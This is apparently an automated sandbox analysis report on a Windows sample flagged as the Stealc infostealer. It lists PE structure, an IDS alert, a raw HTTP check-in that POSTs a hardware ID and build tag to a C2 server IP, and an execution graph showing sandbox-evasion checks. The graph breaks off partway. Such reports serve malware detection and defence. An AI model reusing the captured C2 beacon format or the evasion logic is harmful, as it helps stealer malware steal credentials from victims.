                                    File Icon

                                    Icon Hash:90cececece8e8eb0

                                    Static PE Info

                                    General

                                    Entrypoint:0xb29000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007F0F04500E0Ah

                                    Rich Headers

                                    Programming Language:
                                    • [C++] VS2010 build 30319
                                    • [ASM] VS2010 build 30319
                                    • [ C ] VS2010 build 30319
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [LNK] VS2010 build 30319

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x2e70000x676003f006112543b1c2d59371746a229de7funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x2ea0000x2a00000x200d7a936f7f78d3ebf1651dcc2815ab599unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    yhvanrkb0x58a0000x19e0000x19dc00003414d6e73f6bb6460bc14b7dda9494False0.994987962613293data7.953026815598935IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    owhwljin0x7280000x10000x6009b6084580e4856287a09ec061279715cFalse0.5846354166666666data5.148307749858914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0x7290000x30000x2200b476734633d269146354712d8b289408False0.006318933823529412DOS executable (COM)0.01934167681976598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-10-30T00:20:03.381251+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 30, 2024 00:20:01.898471117 CET4973080192.168.2.4185.215.113.206
                                    Oct 30, 2024 00:20:02.163310051 CET8049730185.215.113.206192.168.2.4
                                    Oct 30, 2024 00:20:02.163435936 CET4973080192.168.2.4185.215.113.206
                                    Oct 30, 2024 00:20:02.163687944 CET4973080192.168.2.4185.215.113.206
                                    Oct 30, 2024 00:20:02.171473026 CET8049730185.215.113.206192.168.2.4
                                    Oct 30, 2024 00:20:03.083554983 CET8049730185.215.113.206192.168.2.4
                                    Oct 30, 2024 00:20:03.083625078 CET4973080192.168.2.4185.215.113.206
                                    Oct 30, 2024 00:20:03.099121094 CET4973080192.168.2.4185.215.113.206
                                    Oct 30, 2024 00:20:03.104547024 CET8049730185.215.113.206192.168.2.4
                                    Oct 30, 2024 00:20:03.381170988 CET8049730185.215.113.206192.168.2.4
                                    Oct 30, 2024 00:20:03.381251097 CET4973080192.168.2.4185.215.113.206
                                    Oct 30, 2024 00:20:05.396298885 CET4973080192.168.2.4185.215.113.206

                                    HTTP Request Dependency Graph

                                    • 185.215.113.206

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449730185.215.113.206804460C:\Users\user\Desktop\file.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 00:20:02.163687944 CET90OUTGET / HTTP/1.1
                                    Host: 185.215.113.206
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Oct 30, 2024 00:20:03.083554983 CET203INHTTP/1.1 200 OK
                                    Date: Tue, 29 Oct 2024 23:20:02 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Oct 30, 2024 00:20:03.099121094 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC
                                    Host: 185.215.113.206
                                    Content-Length: 211
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a
                                    Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--
                                    Oct 30, 2024 00:20:03.381170988 CET210INHTTP/1.1 200 OK
                                    Date: Tue, 29 Oct 2024 23:20:03 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Content-Length: 8
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 59 6d 78 76 59 32 73 3d
                                    Data Ascii: YmxvY2s=


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:19:19:58
                                    Start date:29/10/2024
                                    Path:C:\Users\user\Desktop\file.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                    Imagebase:0xf10000
                                    File size:2'133'504 bytes
                                    MD5 hash:B2D5F7C5A51B55BFE094DBE2A60DA2E3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:3.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:3.5%
                                      Total number of Nodes:1330
                                      Total number of Limit Nodes:24
                                      execution_graph 36048 f26c90 36093 f122a0 36048->36093 36072 f26d04 36073 f2acc0 4 API calls 36072->36073 36074 f26d0b 36073->36074 36075 f2acc0 4 API calls 36074->36075 36076 f26d12 36075->36076 36077 f2acc0 4 API calls 36076->36077 36078 f26d19 36077->36078 36079 f2acc0 4 API calls 36078->36079 36080 f26d20 36079->36080 36245 f2abb0 36080->36245 36082 f26dac 36249 f26bc0 GetSystemTime 36082->36249 36083 f26d29 36083->36082 36085 f26d62 OpenEventA 36083->36085 36088 f26d95 CloseHandle Sleep 36085->36088 36089 f26d79 36085->36089 36091 f26daa 36088->36091 36092 f26d81 CreateEventA 36089->36092 36090 f26db6 CloseHandle ExitProcess 36091->36083 36092->36082 36446 f14610 36093->36446 36095 f122b4 36096 f14610 2 API calls 36095->36096 36097 f122cd 36096->36097 36098 f14610 2 API calls 36097->36098 36099 f122e6 36098->36099 36100 f14610 2 API calls 36099->36100 36101 f122ff 36100->36101 36102 f14610 2 API calls 36101->36102 36103 f12318 36102->36103 36104 f14610 2 API calls 36103->36104 36105 f12331 36104->36105 36106 f14610 2 API calls 36105->36106 36107 f1234a 36106->36107 36108 f14610 2 API calls 36107->36108 36109 f12363 36108->36109 36110 f14610 2 API calls 36109->36110 36111 f1237c 36110->36111 36112 f14610 2 API calls 36111->36112 36113 f12395 36112->36113 36114 f14610 2 API calls 36113->36114 36115 f123ae 36114->36115 36116 f14610 2 API calls 36115->36116 36117 f123c7 36116->36117 36118 f14610 2 API calls 36117->36118 36119 f123e0 36118->36119 36120 f14610 2 API calls 36119->36120 36121 f123f9 36120->36121 36122 f14610 2 API calls 36121->36122 36123 f12412 36122->36123 36124 f14610 2 API calls 36123->36124 36125 f1242b 36124->36125 36126 f14610 2 API calls 36125->36126 36127 f12444 36126->36127 36128 f14610 2 API calls 36127->36128 36129 f1245d 36128->36129 36130 f14610 2 API calls 36129->36130 36131 f12476 36130->36131 36132 f14610 2 API calls 36131->36132 36133 f1248f 36132->36133 36134 f14610 2 API calls 36133->36134 36135 f124a8 36134->36135 36136 f14610 2 API calls 36135->36136 36137 f124c1 36136->36137 36138 f14610 2 API calls 36137->36138 36139 f124da 36138->36139 36140 f14610 2 API calls 36139->36140 36141 f124f3 36140->36141 36142 f14610 2 API calls 36141->36142 36143 f1250c 36142->36143 36144 f14610 2 API calls 36143->36144 36145 f12525 36144->36145 36146 f14610 2 API calls 36145->36146 36147 f1253e 36146->36147 36148 f14610 2 API calls 36147->36148 36149 f12557 36148->36149 36150 f14610 2 API calls 36149->36150 36151 f12570 36150->36151 36152 f14610 2 API calls 36151->36152 36153 f12589 36152->36153 36154 f14610 2 API calls 36153->36154 36155 f125a2 36154->36155 36156 f14610 2 API calls 36155->36156 36157 f125bb 36156->36157 36158 f14610 2 API calls 36157->36158 36159 f125d4 36158->36159 36160 f14610 2 API calls 36159->36160 36161 f125ed 36160->36161 36162 f14610 2 API calls 36161->36162 36163 f12606 36162->36163 36164 f14610 2 API calls 36163->36164 36165 f1261f 36164->36165 36166 f14610 2 API calls 36165->36166 36167 f12638 36166->36167 36168 f14610 2 API calls 36167->36168 36169 f12651 36168->36169 36170 f14610 2 API calls 36169->36170 36171 f1266a 36170->36171 36172 f14610 2 API calls 36171->36172 36173 f12683 36172->36173 36174 f14610 2 API calls 36173->36174 36175 f1269c 36174->36175 36176 f14610 2 API calls 36175->36176 36177 f126b5 36176->36177 36178 f14610 2 API calls 36177->36178 36179 f126ce 36178->36179 36180 f29bb0 36179->36180 36451 f29aa0 GetPEB 36180->36451 36182 f29bb8 36183 f29de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 36182->36183 36184 f29bca 36182->36184 36185 f29e44 GetProcAddress 36183->36185 36186 f29e5d 36183->36186 36189 f29bdc 21 API calls 36184->36189 36185->36186 36187 f29e96 36186->36187 36188 f29e66 GetProcAddress GetProcAddress 36186->36188 36190 f29eb8 36187->36190 36191 f29e9f GetProcAddress 36187->36191 36188->36187 36189->36183 36192 f29ec1 GetProcAddress 36190->36192 36193 f29ed9 36190->36193 36191->36190 36192->36193 36194 f29ee2 GetProcAddress GetProcAddress 36193->36194 36195 f26ca0 36193->36195 36194->36195 36196 f2aa50 36195->36196 36197 f2aa60 36196->36197 36198 f26cad 36197->36198 36199 f2aa8e lstrcpy 36197->36199 36200 f111d0 36198->36200 36199->36198 36201 f111e8 36200->36201 36202 f11217 36201->36202 36203 f1120f ExitProcess 36201->36203 36204 f11160 GetSystemInfo 36202->36204 36205 f11184 36204->36205 36206 f1117c ExitProcess 36204->36206 36207 f11110 GetCurrentProcess VirtualAllocExNuma 36205->36207 36208 f11141 ExitProcess 36207->36208 36209 f11149 36207->36209 36452 f110a0 VirtualAlloc 36209->36452 36212 f11220 36456 f28b40 36212->36456 36215 f11249 __aulldiv 36216 f1129a 36215->36216 36217 f11292 ExitProcess 36215->36217 36218 f26a10 GetUserDefaultLangID 36216->36218 36219 f26a32 36218->36219 36220 f26a73 36218->36220 36219->36220 36221 f26a43 ExitProcess 36219->36221 36222 f26a61 ExitProcess 36219->36222 36223 f26a57 ExitProcess 36219->36223 36224 f26a6b ExitProcess 36219->36224 36225 f26a4d ExitProcess 36219->36225 36226 f11190 36220->36226 36224->36220 36227 f27a70 3 API calls 36226->36227 36228 f1119e 36227->36228 36229 f111cc 36228->36229 36230 f279e0 3 API calls 36228->36230 36233 f279e0 GetProcessHeap RtlAllocateHeap GetUserNameA 36229->36233 36231 f111b7 36230->36231 36231->36229 36232 f111c4 ExitProcess 36231->36232 36234 f26cd0 36233->36234 36235 f27a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 36234->36235 36236 f26ce3 36235->36236 36237 f2acc0 36236->36237 36458 f2aa20 36237->36458 36239 f2acd1 lstrlen 36241 f2acf0 36239->36241 36240 f2ad28 36459 f2aab0 36240->36459 36241->36240 36243 f2ad0a lstrcpy lstrcat 36241->36243 36243->36240 36244 f2ad34 36244->36072 36246 f2abcb 36245->36246 36247 f2ac1b 36246->36247 36248 f2ac09 lstrcpy 36246->36248 36247->36083 36248->36247 36463 f26ac0 36249->36463 36251 f26c2e 36252 f26c38 sscanf 36251->36252 36492 f2ab10 36252->36492 36254 f26c4a SystemTimeToFileTime SystemTimeToFileTime 36255 f26c80 36254->36255 36256 f26c6e 36254->36256 36258 f25d60 36255->36258 36256->36255 36257 f26c78 ExitProcess 36256->36257 36259 f25d6d 36258->36259 36260 f2aa50 lstrcpy 36259->36260 36261 f25d7e 36260->36261 36494 f2ab30 lstrlen 36261->36494 36264 f2ab30 2 API calls 36265 f25db4 36264->36265 36266 f2ab30 2 API calls 36265->36266 36267 f25dc4 36266->36267 36498 f26680 36267->36498 36270 f2ab30 2 API calls 36271 f25de3 36270->36271 36272 f2ab30 2 API calls 36271->36272 36273 f25df0 36272->36273 36274 f2ab30 2 API calls 36273->36274 36275 f25dfd 36274->36275 36276 f2ab30 2 API calls 36275->36276 36277 f25e49 36276->36277 36507 f126f0 36277->36507 36285 f25f13 36286 f26680 lstrcpy 36285->36286 36287 f25f25 36286->36287 36288 f2aab0 lstrcpy 36287->36288 36289 f25f42 36288->36289 36290 f2acc0 4 API calls 36289->36290 36291 f25f5a 36290->36291 36292 f2abb0 lstrcpy 36291->36292 36293 f25f66 36292->36293 36294 f2acc0 4 API calls 36293->36294 36295 f25f8a 36294->36295 36296 f2abb0 lstrcpy 36295->36296 36297 f25f96 36296->36297 36298 f2acc0 4 API calls 36297->36298 36299 f25fba 36298->36299 36300 f2abb0 lstrcpy 36299->36300 36301 f25fc6 36300->36301 36302 f2aa50 lstrcpy 36301->36302 36303 f25fee 36302->36303 37233 f27690 GetWindowsDirectoryA 36303->37233 36306 f2aab0 lstrcpy 36307 f26008 36306->36307 37243 f148d0 36307->37243 36309 f2600e 37388 f219f0 36309->37388 36311 f26016 36312 f2aa50 lstrcpy 36311->36312 36313 f26039 36312->36313 36314 f11590 lstrcpy 36313->36314 36315 f2604d 36314->36315 37404 f159b0 34 API calls codecvt 36315->37404 36317 f26053 37405 f21280 lstrlen lstrcpy 36317->37405 36319 f2605e 36320 f2aa50 lstrcpy 36319->36320 36321 f26082 36320->36321 36322 f11590 lstrcpy 36321->36322 36323 f26096 36322->36323 37406 f159b0 34 API calls codecvt 36323->37406 36325 f2609c 37407 f20fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 36325->37407 36327 f260a7 36328 f2aa50 lstrcpy 36327->36328 36329 f260c9 36328->36329 36330 f11590 lstrcpy 36329->36330 36331 f260dd 36330->36331 37408 f159b0 34 API calls codecvt 36331->37408 36333 f260e3 37409 f21170 StrCmpCA lstrlen lstrcpy 36333->37409 36335 f260ee 36336 f11590 lstrcpy 36335->36336 36337 f26105 36336->36337 37410 f21c60 115 API calls 36337->37410 36339 f2610a 36340 f2aa50 lstrcpy 36339->36340 36341 f26126 36340->36341 37411 f15000 7 API calls 36341->37411 36343 f2612b 36344 f11590 lstrcpy 36343->36344 36345 f261ab 36344->36345 37412 f208a0 289 API calls 36345->37412 36347 f261b0 36348 f2aa50 lstrcpy 36347->36348 36349 f261d6 36348->36349 36350 f11590 lstrcpy 36349->36350 36351 f261ea 36350->36351 37413 f159b0 34 API calls codecvt 36351->37413 36353 f261f0 37414 f213c0 StrCmpCA lstrlen lstrcpy 36353->37414 36355 f261fb 36356 f11590 lstrcpy 36355->36356 36357 f2623b 36356->36357 37415 f11ec0 59 API calls 36357->37415 36359 f26240 36360 f262e2 36359->36360 36361 f26250 36359->36361 36362 f2aab0 lstrcpy 36360->36362 36363 f2aa50 lstrcpy 36361->36363 36364 f262f5 36362->36364 36365 f26270 36363->36365 36366 f11590 lstrcpy 36364->36366 36367 f11590 lstrcpy 36365->36367 36368 f26309 36366->36368 36369 f26284 36367->36369 37419 f159b0 34 API calls codecvt 36368->37419 37416 f159b0 34 API calls codecvt 36369->37416 36372 f2630f 37420 f237b0 31 API calls 36372->37420 36373 f2628a 37417 f21520 19 API calls codecvt 36373->37417 36376 f262da 36379 f2635b 36376->36379 36382 f11590 lstrcpy 36376->36382 36377 f26295 36378 f11590 lstrcpy 36377->36378 36380 f262d5 36378->36380 36381 f26380 36379->36381 36384 f11590 lstrcpy 36379->36384 37418 f24010 67 API calls 36380->37418 36385 f263a5 36381->36385 36389 f11590 lstrcpy 36381->36389 36386 f26337 36382->36386 36388 f2637b 36384->36388 36387 f263ca 36385->36387 36391 f11590 lstrcpy 36385->36391 37421 f24300 58 API calls codecvt 36386->37421 36392 f263ef 36387->36392 36398 f11590 lstrcpy 36387->36398 37423 f249d0 88 API calls codecvt 36388->37423 36394 f263a0 36389->36394 36397 f263c5 36391->36397 36399 f26414 36392->36399 36405 f11590 lstrcpy 36392->36405 37424 f24e00 61 API calls codecvt 36394->37424 36395 f2633c 36396 f11590 lstrcpy 36395->36396 36401 f26356 36396->36401 37425 f24fc0 65 API calls 36397->37425 36404 f263ea 36398->36404 36402 f26439 36399->36402 36407 f11590 lstrcpy 36399->36407 37422 f25350 46 API calls 36401->37422 36408 f26460 36402->36408 36413 f11590 lstrcpy 36402->36413 37426 f25190 63 API calls codecvt 36404->37426 36410 f2640f 36405->36410 36412 f26434 36407->36412 36414 f26503 36408->36414 36415 f26470 36408->36415 37427 f17770 109 API calls codecvt 36410->37427 37428 f252a0 61 API calls codecvt 36412->37428 36418 f26459 36413->36418 36419 f2aab0 lstrcpy 36414->36419 36416 f2aa50 lstrcpy 36415->36416 36420 f26491 36416->36420 37429 f291a0 46 API calls codecvt 36418->37429 36422 f26516 36419->36422 36423 f11590 lstrcpy 36420->36423 36424 f11590 lstrcpy 36422->36424 36426 f264a5 36423->36426 36425 f2652a 36424->36425 37433 f159b0 34 API calls codecvt 36425->37433 37430 f159b0 34 API calls codecvt 36426->37430 36429 f26530 37434 f237b0 31 API calls 36429->37434 36430 f264ab 37431 f21520 19 API calls codecvt 36430->37431 36433 f264fb 36436 f2aab0 lstrcpy 36433->36436 36434 f264b6 36435 f11590 lstrcpy 36434->36435 36437 f264f6 36435->36437 36438 f2654c 36436->36438 37432 f24010 67 API calls 36437->37432 36440 f11590 lstrcpy 36438->36440 36441 f26560 36440->36441 37435 f159b0 34 API calls codecvt 36441->37435 36443 f2656c 36445 f26588 36443->36445 37436 f268d0 9 API calls codecvt 36443->37436 36445->36090 36447 f14621 RtlAllocateHeap 36446->36447 36450 f14671 VirtualProtect 36447->36450 36450->36095 36451->36182 36454 f110c2 codecvt 36452->36454 36453 f110fd 36453->36212 36454->36453 36455 f110e2 VirtualFree 36454->36455 36455->36453 36457 f11233 GlobalMemoryStatusEx 36456->36457 36457->36215 36458->36239 36460 f2aad2 36459->36460 36461 f2aafc 36460->36461 36462 f2aaea lstrcpy 36460->36462 36461->36244 36462->36461 36464 f2aa50 lstrcpy 36463->36464 36465 f26ad3 36464->36465 36466 f2acc0 4 API calls 36465->36466 36467 f26ae5 36466->36467 36468 f2abb0 lstrcpy 36467->36468 36469 f26aee 36468->36469 36470 f2acc0 4 API calls 36469->36470 36471 f26b07 36470->36471 36472 f2abb0 lstrcpy 36471->36472 36473 f26b10 36472->36473 36474 f2acc0 4 API calls 36473->36474 36475 f26b2a 36474->36475 36476 f2abb0 lstrcpy 36475->36476 36477 f26b33 36476->36477 36478 f2acc0 4 API calls 36477->36478 36479 f26b4c 36478->36479 36480 f2abb0 lstrcpy 36479->36480 36481 f26b55 36480->36481 36482 f2acc0 4 API calls 36481->36482 36483 f26b6f 36482->36483 36484 f2abb0 lstrcpy 36483->36484 36485 f26b78 36484->36485 36486 f2acc0 4 API calls 36485->36486 36487 f26b93 36486->36487 36488 f2abb0 lstrcpy 36487->36488 36489 f26b9c 36488->36489 36490 f2aab0 lstrcpy 36489->36490 36491 f26bb0 36490->36491 36491->36251 36493 f2ab22 36492->36493 36493->36254 36495 f2ab4f 36494->36495 36496 f25da4 36495->36496 36497 f2ab8b lstrcpy 36495->36497 36496->36264 36497->36496 36499 f2abb0 lstrcpy 36498->36499 36500 f26693 36499->36500 36501 f2abb0 lstrcpy 36500->36501 36502 f266a5 36501->36502 36503 f2abb0 lstrcpy 36502->36503 36504 f266b7 36503->36504 36505 f2abb0 lstrcpy 36504->36505 36506 f25dd6 36505->36506 36506->36270 36508 f14610 2 API calls 36507->36508 36509 f12704 36508->36509 36510 f14610 2 API calls 36509->36510 36511 f12727 36510->36511 36512 f14610 2 API calls 36511->36512 36513 f12740 36512->36513 36514 f14610 2 API calls 36513->36514 36515 f12759 36514->36515 36516 f14610 2 API calls 36515->36516 36517 f12786 36516->36517 36518 f14610 2 API calls 36517->36518 36519 f1279f 36518->36519 36520 f14610 2 API calls 36519->36520 36521 f127b8 36520->36521 36522 f14610 2 API calls 36521->36522 36523 f127e5 36522->36523 36524 f14610 2 API calls 36523->36524 36525 f127fe 36524->36525 36526 f14610 2 API calls 36525->36526 36527 f12817 36526->36527 36528 f14610 2 API calls 36527->36528 36529 f12830 36528->36529 36530 f14610 2 API calls 36529->36530 36531 f12849 36530->36531 36532 f14610 2 API calls 36531->36532 36533 f12862 36532->36533 36534 f14610 2 API calls 36533->36534 36535 f1287b 36534->36535 36536 f14610 2 API calls 36535->36536 36537 f12894 36536->36537 36538 f14610 2 API calls 36537->36538 36539 f128ad 36538->36539 36540 f14610 2 API calls 36539->36540 36541 f128c6 36540->36541 36542 f14610 2 API calls 36541->36542 36543 f128df 36542->36543 36544 f14610 2 API calls 36543->36544 36545 f128f8 36544->36545 36546 f14610 2 API calls 36545->36546 36547 f12911 36546->36547 36548 f14610 2 API calls 36547->36548 36549 f1292a 36548->36549 36550 f14610 2 API calls 36549->36550 36551 f12943 36550->36551 36552 f14610 2 API calls 36551->36552 36553 f1295c 36552->36553 36554 f14610 2 API calls 36553->36554 36555 f12975 36554->36555 36556 f14610 2 API calls 36555->36556 36557 f1298e 36556->36557 36558 f14610 2 API calls 36557->36558 36559 f129a7 36558->36559 36560 f14610 2 API calls 36559->36560 36561 f129c0 36560->36561 36562 f14610 2 API calls 36561->36562 36563 f129d9 36562->36563 36564 f14610 2 API calls 36563->36564 36565 f129f2 36564->36565 36566 f14610 2 API calls 36565->36566 36567 f12a0b 36566->36567 36568 f14610 2 API calls 36567->36568 36569 f12a24 36568->36569 36570 f14610 2 API calls 36569->36570 36571 f12a3d 36570->36571 36572 f14610 2 API calls 36571->36572 36573 f12a56 36572->36573 36574 f14610 2 API calls 36573->36574 36575 f12a6f 36574->36575 36576 f14610 2 API calls 36575->36576 36577 f12a88 36576->36577 36578 f14610 2 API calls 36577->36578 36579 f12aa1 36578->36579 36580 f14610 2 API calls 36579->36580 36581 f12aba 36580->36581 36582 f14610 2 API calls 36581->36582 36583 f12ad3 36582->36583 36584 f14610 2 API calls 36583->36584 36585 f12aec 36584->36585 36586 f14610 2 API calls 36585->36586 36587 f12b05 36586->36587 36588 f14610 2 API calls 36587->36588 36589 f12b1e 36588->36589 36590 f14610 2 API calls 36589->36590 36591 f12b37 36590->36591 36592 f14610 2 API calls 36591->36592 36593 f12b50 36592->36593 36594 f14610 2 API calls 36593->36594 36595 f12b69 36594->36595 36596 f14610 2 API calls 36595->36596 36597 f12b82 36596->36597 36598 f14610 2 API calls 36597->36598 36599 f12b9b 36598->36599 36600 f14610 2 API calls 36599->36600 36601 f12bb4 36600->36601 36602 f14610 2 API calls 36601->36602 36603 f12bcd 36602->36603 36604 f14610 2 API calls 36603->36604 36605 f12be6 36604->36605 36606 f14610 2 API calls 36605->36606 36607 f12bff 36606->36607 36608 f14610 2 API calls 36607->36608 36609 f12c18 36608->36609 36610 f14610 2 API calls 36609->36610 36611 f12c31 36610->36611 36612 f14610 2 API calls 36611->36612 36613 f12c4a 36612->36613 36614 f14610 2 API calls 36613->36614 36615 f12c63 36614->36615 36616 f14610 2 API calls 36615->36616 36617 f12c7c 36616->36617 36618 f14610 2 API calls 36617->36618 36619 f12c95 36618->36619 36620 f14610 2 API calls 36619->36620 36621 f12cae 36620->36621 36622 f14610 2 API calls 36621->36622 36623 f12cc7 36622->36623 36624 f14610 2 API calls 36623->36624 36625 f12ce0 36624->36625 36626 f14610 2 API calls 36625->36626 36627 f12cf9 36626->36627 36628 f14610 2 API calls 36627->36628 36629 f12d12 36628->36629 36630 f14610 2 API calls 36629->36630 36631 f12d2b 36630->36631 36632 f14610 2 API calls 36631->36632 36633 f12d44 36632->36633 36634 f14610 2 API calls 36633->36634 36635 f12d5d 36634->36635 36636 f14610 2 API calls 36635->36636 36637 f12d76 36636->36637 36638 f14610 2 API calls 36637->36638 36639 f12d8f 36638->36639 36640 f14610 2 API calls 36639->36640 36641 f12da8 36640->36641 36642 f14610 2 API calls 36641->36642 36643 f12dc1 36642->36643 36644 f14610 2 API calls 36643->36644 36645 f12dda 36644->36645 36646 f14610 2 API calls 36645->36646 36647 f12df3 36646->36647 36648 f14610 2 API calls 36647->36648 36649 f12e0c 36648->36649 36650 f14610 2 API calls 36649->36650 36651 f12e25 36650->36651 36652 f14610 2 API calls 36651->36652 36653 f12e3e 36652->36653 36654 f14610 2 API calls 36653->36654 36655 f12e57 36654->36655 36656 f14610 2 API calls 36655->36656 36657 f12e70 36656->36657 36658 f14610 2 API calls 36657->36658 36659 f12e89 36658->36659 36660 f14610 2 API calls 36659->36660 36661 f12ea2 36660->36661 36662 f14610 2 API calls 36661->36662 36663 f12ebb 36662->36663 36664 f14610 2 API calls 36663->36664 36665 f12ed4 36664->36665 36666 f14610 2 API calls 36665->36666 36667 f12eed 36666->36667 36668 f14610 2 API calls 36667->36668 36669 f12f06 36668->36669 36670 f14610 2 API calls 36669->36670 36671 f12f1f 36670->36671 36672 f14610 2 API calls 36671->36672 36673 f12f38 36672->36673 36674 f14610 2 API calls 36673->36674 36675 f12f51 36674->36675 36676 f14610 